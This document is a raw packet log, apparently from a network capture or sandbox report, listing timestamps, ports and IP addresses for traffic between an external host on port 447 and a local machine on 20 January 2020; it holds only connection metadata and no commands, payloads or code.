Jan 20, 2020 14:20:30.366318941 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366461992 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366511106 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366585016 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.366667986 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366801023 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.366838932 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366878033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.366996050 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.367049932 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.367182016 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.367271900 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.367348909 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.371990919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372092962 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372262001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372380972 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.372390985 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372524023 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372541904 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.372631073 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372665882 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372797012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372935057 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.372972965 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.373126030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373126984 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.373147964 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373234987 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373347998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373364925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.373466015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373542070 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.373548031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373677015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373753071 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.373796940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373907089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.373944998 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.374005079 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374136925 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374171019 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.374258041 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374352932 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374427080 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.374468088 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374569893 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374643087 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.374672890 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374784946 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.374785900 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374913931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.374982119 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.375112057 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375133991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375221968 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375292063 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.375334024 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375433922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375507116 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.375564098 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375638008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.375677109 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375777960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.375849009 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.375909090 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376012087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376071930 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.376135111 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376243114 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376300097 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.376363039 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376471996 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376538038 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.376594067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376650095 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.376707077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376816034 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376926899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.376934052 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.377058983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377130985 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.377165079 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377273083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377331018 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.377393007 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377502918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377616882 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377655983 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.377746105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377842903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377960920 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.377962112 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.378123045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378163099 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.378220081 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378349066 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378407001 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.378446102 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378582001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378618002 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.378674984 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378803015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.378839016 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.378921986 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.379087925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.379117012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.379137993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.379230022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.379332066 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.380152941 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.385816097 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.385935068 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.386054039 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.386082888 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.386153936 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.386354923 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.392683983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.396568060 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.396716118 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.396795988 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.396823883 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.396960974 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.396985054 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397067070 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397178888 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397233963 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.397399902 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397499084 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397522926 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397571087 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.397612095 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397656918 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.397751093 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397893906 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.397923946 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.397945881 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398145914 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.398207903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398230076 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398345947 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398406982 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.398463011 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398626089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398641109 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.398719072 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.398838043 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.398904085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399009943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399111032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399158955 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.399224043 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399333954 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399348974 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.399446011 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399555922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399621010 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.399667978 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399770021 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.399889946 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.399892092 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400002003 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400074959 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.400129080 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400235891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400268078 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.400348902 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400469065 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400527000 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.400584936 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400691032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400759935 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.400815964 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400926113 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.400957108 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.401113033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401235104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401262999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401314974 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.401386023 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401446104 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.401503086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401614904 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401676893 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.401732922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401843071 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.401918888 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.401966095 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402131081 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.402137995 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402240992 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402332067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402405977 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.402451038 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402570009 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402609110 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.402671099 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402797937 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.402822971 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.402914047 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403094053 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.403110027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403136015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403228045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403280973 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.403364897 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403455973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403527975 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.403562069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403671026 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403732061 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.403795004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403904915 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.403978109 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.404021978 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404167891 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.404211998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404247046 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404362917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404433966 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.404479027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404582024 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404648066 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.404711962 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404819965 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.404844046 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.404936075 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.405118942 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.405795097 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.405910015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.406071901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.406078100 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.415792942 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.415915012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.415982008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.416074991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.416255951 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.416560888 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.416666031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.416745901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.416801929 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.421967983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422142982 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.422215939 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422301054 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422327995 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422435999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422489882 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422503948 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.422621012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422678947 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.422734976 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422852993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.422884941 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.422990084 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.423110008 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.423166037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.423229933 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.423316002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.423427105 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.424235106 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424354076 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424454927 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.424468040 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424576998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424649954 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.424700022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424823046 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.424837112 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.424920082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425069094 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.425115108 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425137997 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425225973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425302982 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.425354958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425453901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425573111 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425576925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.425685883 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425760031 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.425812960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425924063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.425945044 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.426105976 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426211119 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426315069 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.426321030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426419020 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426500082 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.426533937 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426640034 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426687002 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.426760912 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426877022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.426886082 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.426992893 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427126884 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427158117 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.427242041 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427330971 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427423954 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.427449942 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427555084 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427623034 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.427670002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427798033 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.427802086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.427907944 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428014040 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428113937 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.428118944 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428224087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428297997 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.428339005 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428451061 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428484917 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.428559065 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428675890 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428685904 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.428781033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428899050 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.428968906 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.429016113 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429140091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429227114 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.429286957 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429388046 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429430008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.429517031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429620028 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429685116 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.429730892 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429858923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.429951906 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.429972887 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430121899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430169106 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.430233955 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.430340052 CET	49193	447	192.168.0.40	185.62.189.249
